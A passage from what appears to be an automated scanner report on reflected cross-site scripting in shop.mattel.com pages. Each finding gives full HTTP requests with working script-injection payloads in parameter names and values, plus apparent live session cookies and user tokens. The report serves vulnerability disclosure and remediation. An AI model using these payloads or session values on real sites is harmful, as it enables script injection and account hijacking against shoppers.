GET /category/index.jsp;jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825?categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <!-- === Request Query String: jsessionid=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825&categoryId=374128468cfa--><script>alert(1)</script>ace09a66a83 --> ...[SNIP]...
1.13. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/category/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ab2"-alert(1)-"a83d7d56bb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /category/index.jsp?57ab2"-alert(1)-"a83d7d56bb0=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.14. http://shop.mattel.com/category/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/category/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload d0648--><script>alert(1)</script>18bef240369 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /category/index.jsp?d0648--><script>alert(1)</script>18bef240369=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "ht ...[SNIP]... <!-- === Request Query String: d0648--><script>alert(1)</script>18bef240369=1 --> ...[SNIP]...
1.15. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62aed--><script>alert(1)</script>19aa858cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /emailSignup/index.jsp?62aed--><script>alert(1)</script>19aa858cf=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:50 GMT Server: Apache/2.0.63 (Unix) Cache-Control: P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <!-- === Request Query String: 62aed--><script>alert(1)</script>19aa858cf=1 --> ...[SNIP]...
1.16. http://shop.mattel.com/emailSignup/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/emailSignup/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 130c3"-alert(1)-"e1a4d627d26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /emailSignup/index.jsp?130c3"-alert(1)-"e1a4d627d26=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:49 GMT Server: Apache/2.0.63 (Unix) Cache-Control: P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml" X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 50741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/ ...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
The value of the cp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 59b7b"-alert(1)-"9499bf6d796 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family/index.jsp?categoryId=3812552&cp=381231759b7b"-alert(1)-"9499bf6d796 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the cp request parameter is copied into an HTML comment. The payload 51834--><script>alert(1)</script>f36fc4cd686 was submitted in the cp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /family/index.jsp?categoryId=3812552&cp=381231751834--><script>alert(1)</script>f36fc4cd686 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77aaf"%3balert(1)//1f834e93093 was submitted in the jsessionid parameter. This input was echoed as 77aaf";alert(1)//1f834e93093 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family/index.jsp;jsessionid=77aaf"%3balert(1)//1f834e93093 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
The value of the jsessionid request parameter is copied into an HTML comment. The payload 320da--><script>alert(1)</script>34133063b89 was submitted in the jsessionid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /family/index.jsp;jsessionid=320da--><script>alert(1)</script>34133063b89 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.21. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/family/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c93c--><script>alert(1)</script>4ed9c217b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /family/index.jsp?9c93c--><script>alert(1)</script>4ed9c217b51=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.22. http://shop.mattel.com/family/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/family/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fab71"-alert(1)-"9445a5148d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /family/index.jsp?fab71"-alert(1)-"9445a5148d9=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
1.23. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d072a"-alert(1)-"13ed71b93db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /giftCertificates/index.jsp?d072a"-alert(1)-"13ed71b93db=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:46 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43535
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]... <script type="text/javascript"> if(ess){}else{ var ess = {}; }
1.24. http://shop.mattel.com/giftCertificates/index.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://shop.mattel.com
Path:
/giftCertificates/index.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7abdc--><script>alert(1)</script>ca2770aa469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /giftCertificates/index.jsp?7abdc--><script>alert(1)</script>ca2770aa469=1 HTTP/1.1 Host: shop.mattel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fsr.r={"d":90,"i":"1293084532036_345990","e":1293689411888}; JSESSIONID=YPp4NSTLSh11Vgchbnbnnl3QnMMhsc1fc0sSYST5LbttQn2Nzfvn!-1434729825; fsr.s={"cp":{"foreseeORSO":"0"},"v":1,"rid":"1293084532036_345990","ru":"http://www.barbie.com/videogirl/","r":"www.barbie.com","st":"","pv":3,"to":3.2,"c":"https://shop.mattel.com/checkout/index.jsp","lc":{"d0":{"v":3,"s":true,"e":1}},"cd":0,"sd":0,"l":"en","i":-1,"f":1293084639653}; __g_c=w%3A1%7Cb%3A5%7Cr%3A%7Cc%3A282796936791046%7Cd%3A1%7Ca%3A0%7Ce%3A0.5%7Cf%3A0%7Ch%3A1; __utmz=33623806.1293084530.1.1.utmcsr=barbie.com|utmccn=(referral)|utmcmd=referral|utmcct=/videogirl/; fsr.a=1293084641178; browser_id=118201181974; __g_u=282796936791046_1_0.5_0_5_1293516527835_1; user_token=198d1d6e46c1b384847cf34ef2ea51c675528512; st_new=1; rvdata=XR7e504f58165e4b1a0f4f1a175b0a0a0304; __utma=33623806.393361835.1293084530.1293084530.1293084530.1; st_bridge_userId=mattel3wv3rk45ypwkp2zcrdbo1l3p; __utmc=33623806; __utmb=33623806.2.10.1293084530;
Response
HTTP/1.1 200 OK Date: Thu, 23 Dec 2010 00:14:52 GMT Server: Apache/2.0.63 (Unix) X-Powered-By: Servlet/2.5 JSP/2.1 Vary: Accept-Encoding X-UA-Compatible: IE=EmulateIE7 Connection: close Content-Type: text/html; charset=ISO-8859-1 Content-Length: 43591
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the display request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11184"-alert(1)-"137cfc99da6 was submitted in the display parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
